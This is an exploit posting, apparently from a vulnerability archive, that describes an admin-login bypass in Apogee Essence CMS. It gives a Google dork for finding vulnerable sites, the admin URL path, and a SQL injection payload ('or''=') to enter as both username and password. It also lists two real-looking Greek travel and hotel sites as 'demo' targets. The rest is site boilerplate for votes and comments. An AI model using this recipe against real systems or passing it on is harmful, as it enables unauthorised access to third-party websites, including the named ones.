Powered by Apogee Essence CMS Admin Page ByPass

2016.12.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################## # Exploit Title: Powered by Apogee Essence CMS # Google Dork : intext:''Powered by Apogee Essence CMS'' # Date:10-12-2016 # Discovered By: TC635mm Turkish Cyber Attacker # We Are TURKHACKTEAM # Home: turkhackteam.org # Tested on : Win7 ################################### # Search dork and select Target. Put [admin] After url such as : # http://site.com/admin/user/check/ # Now enter fill username and Password like the information below : # Username : 'or''=' # Password : 'or''=' ########################## # Demo : http://itertravel.com.gr/admin/user/check/ https://www.hoteldespotiko.gr/admin/user/check/ ############################# #Thanks to : || TC635mm || Turkhackteam.org And All Of Turkhackteam # Discovered By: TC635mm | Turkhackteam


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top